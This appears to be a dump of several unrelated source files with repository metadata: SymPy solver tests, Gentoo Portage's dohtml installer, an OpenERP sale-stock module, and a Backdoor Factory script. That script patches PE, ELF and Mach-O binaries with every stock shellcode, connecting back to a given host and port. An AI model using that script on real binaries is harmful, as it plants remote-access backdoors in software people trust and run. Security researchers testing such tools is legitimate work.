return sstr(sympify(e).evalf(n, **options), full_prec=True)
def test_swap_back():
# A solution comes back from solve even though it shouldn't be: f(x) is
# in the solution's Integral as the upper limit. When solve is fixed this
# test should be removed. For now, since there are ode's that come back
# with these sorts of solutions, the swap_back feature is performed in
# solve and tested here.
# This appears to be fixed - the equation is not solved.
x = Symbol('x')
f = Function('f')
raises(NotImplementedError, "solve(Eq(log(f(x)), Integral(x, (x, 1, f(x)))), f(x))")
def test_guess_poly():
"""
See solvers.guess_solve_strategy
"""
x, y, a = symbols('x,y,a')
# polynomial equations
assert guess_solve_strategy( S(4), x ) == GS_POLY
assert guess_solve_strategy( x, x ) == GS_POLY
assert guess_solve_strategy( x + a, x ) == GS_POLY
assert guess_solve_strategy( 2*x, x ) == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1,4), x) == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) == GS_POLY
assert guess_solve_strategy( x*y + y, x ) == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) == GS_POLY
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), x) == GS_POLY
def test_guess_poly_cv():
x, y = symbols('x,y')
# polynomial equations via a change of variable
assert guess_solve_strategy( x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( x**Rational(1,3) + x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) == GS_POLY_CV_1
# polynomial equation multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
x, y = symbols('x,y')
assert guess_solve_strategy( (x+1)/(x**2 + 2), x) == GS_RATIONAL
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), y) == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (x**Rational(1,2) + 1)/(x**Rational(1,3) + x**Rational(1,2) + 1), x ) \
== GS_RATIONAL_CV_1
def test_guess_transcendental():
x, y, a, b = symbols('x,y,a,b')
#transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x)-y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( exp(x) + exp(-x) - y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x-10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x+10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(a*x**b-y, x) == GS_TRANSCENDENTAL
def test_solve_args():
x, y = symbols('x,y')
#implicit symbol to solve for
assert set(int(tmp) for tmp in solve(x**2-4)) == set([2,-2])
assert solve([x+y-3,x-y-5]) == {x: 4, y: -1}
#no symbol to solve for
assert solve(42) == []
assert solve([1,2]) == None
#multiple symbols
assert solve(x+y-3,[x,y]) == {x: [3 - y], y: [3 - x]}
#symbol is not a symbol or function
raises(TypeError, "solve(x**2-pi, pi)")
def test_solve_polynomial1():
x, y, a = symbols('x,y,a')
assert solve(3*x-2, x) == [Rational(2,3)]
assert solve(Eq(3*x, 2), x) == [Rational(2,3)]
assert solve(x**2-1, x) in [[-1, 1], [1, -1]]
assert solve(Eq(x**2, 1), x) in [[-1, 1], [1, -1]]
assert solve( x - y**3, x) == [y**3]
assert sorted(solve( x - y**3, y)) == sorted([
(-x**Rational(1,3))/2 + I*sqrt(3)*x**Rational(1,3)/2,
x**Rational(1,3),
(-x**Rational(1,3))/2 - I*sqrt(3)*x**Rational(1,3)/2,
])
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
assert solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y) == \
{ y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
solution = {y: S.Zero, x: S.Zero}
assert solve((x-y, x+y), x, y ) == solution
assert solve((x-y, x+y), (x, y)) == solution
assert solve((x-y, x+y), [x, y]) == solution
assert solve( x**3 - 15*x - 4, x) == [-2 + 3**Rational(1,2),
4,
-2 - 3**Rational(1,2) ]
assert sorted(solve((x**2 - 1)**2 - a, x)) == \
sorted([(1 + a**S.Half)**S.Half, -(1 + a**S.Half)**S.Half,
(1 - a**S.Half)**S.Half, -(1 - a**S.Half)**S.Half])
def test_solve_polynomial2():
x = Symbol('x')
assert solve(4, x) == []
def test_solve_polynomial_cv_1a():
"""
Test for solving on equations that can be converted to a polynomial equation
using the change of variable y -> x**Rational(p, q)
"""
x = Symbol('x')
assert solve( x**Rational(1,2) - 1, x) == [1]
assert solve( x**Rational(1,2) - 2, x) == [4]
assert solve( x**Rational(1,4) - 2, x) == [16]
assert solve( x**Rational(1,3) - 3, x) == [27]
ans = solve(x**Rational(1,2)+x**Rational(1,3)+x**Rational(1,4),x)
assert set([NS(w, n=2) for w in ans]) == \
set(['0.010', '-9.5 + 2.8*I', '0', '-9.5 - 2.8*I'])
def test_solve_polynomial_cv_1b():
x, a = symbols('x a')
assert set(solve(4*x*(1 - a*x**(S(1)/2)), x)) == set([S(0), 1/a**2])
assert set(solve(x * (x**(S(1)/3) - 3), x)) == set([S(0), S(27)])
def test_solve_polynomial_cv_2():
"""
Test for solving on equations that can be converted to a polynomial equation
multiplying both sides of the equation by x**m
"""
x = Symbol('x')
assert solve(x + 1/x - 1, x) in \
[[ Rational(1,2) + I*sqrt(3)/2, Rational(1,2) - I*sqrt(3)/2],
[ Rational(1,2) - I*sqrt(3)/2, Rational(1,2) + I*sqrt(3)/2]]
def test_solve_rational():
"""Test solve for rational functions"""
x, y, a, b = symbols('x,y,a,b')
assert solve( ( x - y**3 )/( (y**2)*sqrt(1 - y**2) ), x) == [y**3]
def test_linear_system():
x, y, z, t, n = symbols('x,y,z,t,n')
assert solve([x-1, x-y, x-2*y, y-1], [x,y]) is None
assert solve([x-1, x-y, x-2*y, x-1], [x,y]) is None
assert solve([x-1, x-1, x-y, x-2*y], [x,y]) is None
assert solve([x+5*y-2, -3*x+6*y-15], x, y) == {x: -3, y: 1}
M = Matrix([[0,0,n*(n+1),(n+1)**2,0],
[n+1,n+1,-2*n-1,-(n+1),0],
[-1, 0, 1, 0, 0]])
assert solve_linear_system(M, x, y, z, t) == \
{y: 0, z: -t*(1 + n)/n, x: -t*(1 + n)/n}
def test_linear_systemLU():
x, y, z, n = symbols('x,y,z,n')
M = Matrix([[1,2,0,1],[1,3,2*n,1],[4,-1,n**2,1]])
assert solve_linear_system_LU(M, [x,y,z]) == {z: -3/(n**2+18*n),
x: 1-12*n/(n**2+18*n),
y: 6*n/(n**2+18*n)}
# Note: multiple solutions exist for some of these equations, so the tests
# should be expected to break if the implementation of the solver changes
# in such a way that a different branch is chosen
def test_tsolve():
a, b = symbols('a,b')
x, y, z = symbols('x,y,z')
assert solve(exp(x)-3, x) == [log(3)]
assert solve((a*x+b)*(exp(x)-3), x) == [-b/a, log(3)]
assert solve(cos(x)-y, x) == [acos(y)]
assert solve(2*cos(x)-y,x)== [acos(y/2)]
raises(NotImplementedError, "solve(Eq(cos(x), sin(x)), x)")
# XXX in the following test, log(2*y + 2*...) should -> log(2) + log(y +...)
assert solve(exp(x) + exp(-x) - y, x) == [
-log(4) + log(2*y + 2*(-4 + y**2)**Rational(1,2)),
-log(4) + log(2*y - 2*(-4 + y**2)**Rational(1,2))
]
assert solve(exp(x)-3, x) == [log(3)]
assert solve(Eq(exp(x), 3), x) == [log(3)]
assert solve(log(x)-3, x) == [exp(3)]
assert solve(sqrt(3*x)-4, x) == [Rational(16,3)]
assert solve(3**(x+2), x) == [zoo]
assert solve(3**(2-x), x) == [zoo]
assert solve(4*3**(5*x+2)-7, x) == [(-log(4) - 2*log(3) + log(7))/(5*log(3))]
assert solve(x+2**x, x) == [-LambertW(log(2))/log(2)]
assert solve(3*x+5+2**(-5*x+3), x) in \
[[-Rational(5,3) + LambertW(-10240*2**Rational(1,3)*log(2)/3)/(5*log(2))],\
[(-25*log(2) + 3*LambertW(-10240*2**(Rational(1, 3))*log(2)/3))/(15*log(2))]]
assert solve(5*x-1+3*exp(2-7*x), x) == \
[Rational(1,5) + LambertW(-21*exp(Rational(3,5))/5)/7]
assert solve(2*x+5+log(3*x-2), x) == \
[Rational(2,3) + LambertW(2*exp(-Rational(19,3))/3)/2]
assert solve(3*x+log(4*x), x) == [LambertW(Rational(3,4))/3]
assert solve((2*x+8)*(8+exp(x)), x) == [-4, log(8) + pi*I]
assert solve(2*exp(3*x+4)-3, x) in [ [-Rational(4,3)+log(Rational(3,2))/3],\
[Rational(-4, 3) - log(2)/3 + log(3)/3]]
assert solve(2*log(3*x+4)-3, x) == [(exp(Rational(3,2))-4)/3]
assert solve(exp(x)+1, x) == [pi*I]
assert solve(x**2 - 2**x, x) == [2]
assert solve(x**3 - 3**x, x) == [-3/log(3)*LambertW(-log(3)/3)]
A = -7*2**Rational(4, 5)*6**Rational(1, 5)*log(7)/10
B = -7*3**Rational(1, 5)*log(7)/5
result = solve(2*(3*x+4)**5 - 6*7**(3*x+9), x)
assert len(result) == 1 and expand(result[0]) in [
Rational(-4, 3) - 5/log(7)/3*LambertW(A),
Rational(-4, 3) - 5/log(7)/3*LambertW(B),
]
assert solve(z*cos(x)-y, x) == [acos(y/z)]
assert solve(z*cos(2*x)-y, x) == [acos(y/z)/2]
assert solve(z*cos(sin(x))-y, x) == [asin(acos(y/z))]
assert solve(z*cos(x), x) == [acos(0)]
# issue #1409
assert solve(y - b*x/(a+x), x) in [[-a*y/(y - b)], [a*y/(b - y)]]
assert solve(y - b*exp(a/x), x) == [a/(-log(b) + log(y))]
# issue #1408
assert solve(y-b/(1+a*x), x) in [[(b - y)/(a*y)], [-((y - b)/(a*y))]]
# issue #1407
assert solve(y-a*x**b , x) == [(y/a)**(1/b)]
# issue #1406
assert solve(z**x - y, x) == [log(y)/log(z)]
# issue #1405
assert solve(2**x - 10, x) == [log(10)/log(2)]
def test_solve_for_functions_derivatives():
t = Symbol('t')
x = Function('x')(t)
y = Function('y')(t)
a11,a12,a21,a22,b1,b2 = symbols('a11,a12,a21,a22,b1,b2')
soln = solve([a11*x + a12*y - b1, a21*x + a22*y - b2], x, y)
assert soln == { y : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x-1, x) == [1]
assert solve(3*x-2, x) == [Rational(2,3)]
soln = solve([a11*x.diff(t) + a12*y.diff(t) - b1, a21*x.diff(t) +
a22*y.diff(t) - b2], x.diff(t), y.diff(t))
assert soln == { y.diff(t) : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x.diff(t) : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
assert solve(x.diff(t)-1, x.diff(t)) == [1]
assert solve(3*x.diff(t)-2, x.diff(t)) == [Rational(2,3)]
eqns = set((3*x - 1, 2*y-4))
assert solve(eqns, set((x,y))) == { x : Rational(1, 3), y: 2 }
x = Symbol('x')
f = Function('f')
F = x**2 + f(x)**2 - 4*x - 1
assert solve(F.diff(x), diff(f(x), x)) == [(2 - x)/f(x)]
# Mixed cased with a Symbol and a Function
x = Symbol('x')
y = Function('y')(t)
soln = solve([a11*x + a12*y.diff(t) - b1, a21*x +
a22*y.diff(t) - b2], x, y.diff(t))
assert soln == { y.diff(t) : (a11*b2 - a21*b1)/(a11*a22 - a12*a21),
x : (a22*b1 - a12*b2)/(a11*a22 - a12*a21) }
def test_issue626():
x = Symbol("x")
f = Function("f")
F = x**2 + f(x)**2 - 4*x - 1
e = F.diff(x)
assert solve(e, f(x).diff(x)) == [(2-x)/f(x)]
def test_solve_linear():
x, y = symbols('x y')
w = Wild('w')
assert solve_linear(x, x) == (0, 1)
assert solve_linear(x, y - 2*x) in [(x, y/3), (y, 3*x)]
assert solve_linear(x, y - 2*x, exclude=[x]) ==(y, 3*x)
assert solve_linear(3*x - y, 0) in [(x, y/3), (y, 3*x)]
assert solve_linear(3*x - y, 0, [x]) == (x, y/3)
assert solve_linear(3*x - y, 0, [y]) == (y, 3*x)
assert solve_linear(x**2/y, 1) == (y, x**2)
assert solve_linear(w, x) in [(w, x), (x, w)]
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y) == \
(y, -2 - cos(x)**2 - sin(x)**2)
assert solve_linear(cos(x)**2 + sin(x)**2 + 2 + y, x=[x]) == \
(2 + y + cos(x)**2 + sin(x)**2, 1)
def test_solve_undetermined_coeffs():
a, b, c, x = symbols('a, b, c, x')
assert solve_undetermined_coeffs(a*x**2 + b*x**2 + b*x + 2*c*x + c + 1, [a, b, c], x) == \
{a: -2, b: 2, c: -1}
# Test that rational functions work
assert solve_undetermined_coeffs(a/x + b/(x + 1) - (2*x + 1)/(x**2 + x), [a, b], x) == \
{a: 1, b: 1}
# Test cancellation in rational functions
assert solve_undetermined_coeffs(((c + 1)*a*x**2 + (c + 1)*b*x**2 +
(c + 1)*b*x + (c + 1)*2*c*x + (c + 1)**2)/(c + 1), [a, b, c], x) == \
{a: -2, b: 2, c: -1}
def test_solve_inequalities():
system = [Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]
assert solve(system) == \
And(Or(And(Lt(-sqrt(2), re(x)), Lt(re(x), -1)),
And(Lt(1, re(x)), Lt(re(x), sqrt(2)))), Eq(im(x), 0))
assert solve(system, assume=Assume(x, Q.real)) == \
Or(And(Lt(-sqrt(2), x), Lt(x, -1)), And(Lt(1, x), Lt(x, sqrt(2))))
|
pernici/sympy
|
sympy/solvers/tests/test_solvers.py
|
Python
|
bsd-3-clause
| 13,913 | 0.016172 |
#!/usr/bin/env python
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import pebin
import machobin
import elfbin
import sys
import os
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if __name__ == "__main__":
'''
Will create patched binaries for each payload for the type of binary provided.
Each payload has it's own port number.
Usage: ./payloadtests.py file 127.0.0.1 8080
'''
if len(sys.argv) != 4:
print "Will create patched binaries for each stock shellcode/payload for the "
print "type of binary provided. Each payload type has it's own port number."
print "Usage:" + str(sys.argv[0]) + " binary HOST PORT"
sys.exit()
file = sys.argv[1]
host = sys.argv[2]
port = int(sys.argv[3])
outputfiles = {}
is_supported = basicDiscovery(file)
if is_supported is "PE":
patchtypes = ['APPEND', 'JUMP', 'SINGLE']
supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
#print supported_file.flItms['avail_shells']
for aShell in supported_file.flItms['avail_shells']:
for patchtype in patchtypes:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
if patchtype == 'APPEND':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, ADD_SECTION=True)
elif patchtype == 'JUMP':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=True)
elif patchtype == 'SINGLE':
supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
|
shadghost/Auto-Backdoor
|
the-backdoor-factory/payloadtests.py
|
Python
|
gpl-3.0
| 6,022 | 0.001993 |
#!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import shutil
import sys
from portage.util import normalize_path
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
try:
os.makedirs(path, 0o755)
except OSError:
if not os.path.isdir(path):
raise
os.chmod(path, 0o755)
def dofile(src,dst):
shutil.copy(src, dst)
os.chmod(dst, 0o644)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
fullpath = basename
if prefix:
fullpath = os.path.join(prefix, fullpath)
if dirname:
fullpath = os.path.join(dirname, fullpath)
if options.DOCDESTTREE:
desttree = options.DOCDESTTREE
else:
desttree = "html"
destdir = os.path.join(options.ED, "usr", "share", "doc",
options.PF.lstrip(os.sep), desttree.lstrip(os.sep),
options.doc_prefix.lstrip(os.sep), prefix).rstrip(os.sep)
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, os.path.join(destdir, basename))
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix:
pfx = os.path.join(prefix, pfx)
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if self.PF:
self.PF = normalize_path(self.PF)
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if self.ED:
self.ED = normalize_path(self.ED)
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
if self.DOCDESTTREE:
self.DOCDESTTREE = normalize_path(self.DOCDESTTREE)
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
if options.doc_prefix:
options.doc_prefix = normalize_path(options.doc_prefix)
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = values
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
endswith_slash = (os.sep, os.sep + ".")
for x in args:
trailing_slash = x.endswith(endswith_slash)
x = normalize_path(x)
if trailing_slash:
# Modify behavior of basename and dirname
# as noted in bug #425214, causing foo/ to
# behave similarly to the way that foo/*
# behaves.
x += os.sep
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
|
prometheanfire/portage
|
bin/dohtml.py
|
Python
|
gpl-2.0
| 6,987 | 0.025619 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_order(osv.osv):
_inherit = "sale.order"
def _get_default_warehouse(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def _get_shipped(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
group = sale.procurement_group_id
if group:
res[sale.id] = all([proc.state in ['cancel', 'done'] for proc in group.procurement_ids])
else:
res[sale.id] = False
return res
def _get_orders(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.procurement_id and move.procurement_id.sale_line_id:
res.add(move.procurement_id.sale_line_id.order_id.id)
return list(res)
def _get_orders_procurements(self, cr, uid, ids, context=None):
res = set()
for proc in self.pool.get('procurement.order').browse(cr, uid, ids, context=context):
if proc.state =='done' and proc.sale_line_id:
res.add(proc.sale_line_id.order_id.id)
return list(res)
def _get_picking_ids(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
if not sale.procurement_group_id:
res[sale.id] = []
continue
res[sale.id] = self.pool.get('stock.picking').search(cr, uid, [('group_id', '=', sale.procurement_group_id.id)], context=context)
return res
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
vals = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, group_id=group_id, context=context)
location_id = order.partner_shipping_id.property_stock_customer.id
vals['location_id'] = location_id
routes = line.route_id and [(4, line.route_id.id)] or []
vals['route_ids'] = routes
vals['warehouse_id'] = order.warehouse_id and order.warehouse_id.id or False
vals['partner_dest_id'] = order.partner_shipping_id.id
return vals
_columns = {
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'shipped': fields.function(_get_shipped, string='Delivered', type='boolean', store={
'procurement.order': (_get_orders_procurements, ['state'], 10)
}),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
'picking_ids': fields.function(_get_picking_ids, method=True, type='one2many', relation='stock.picking', string='Picking associated to this sale'),
}
_defaults = {
'warehouse_id': _get_default_warehouse,
'picking_policy': 'direct',
'order_policy': 'manual',
}
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
val = {}
if warehouse_id:
warehouse = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
if warehouse.company_id:
val['company_id'] = warehouse.company_id.id
return {'value': val}
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing delivery orders
of given sales order ids. It can either be a in a list or in a form
view, if there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_picking_tree_all')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',[" + ','.join(map(str, pick_ids)) + "])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
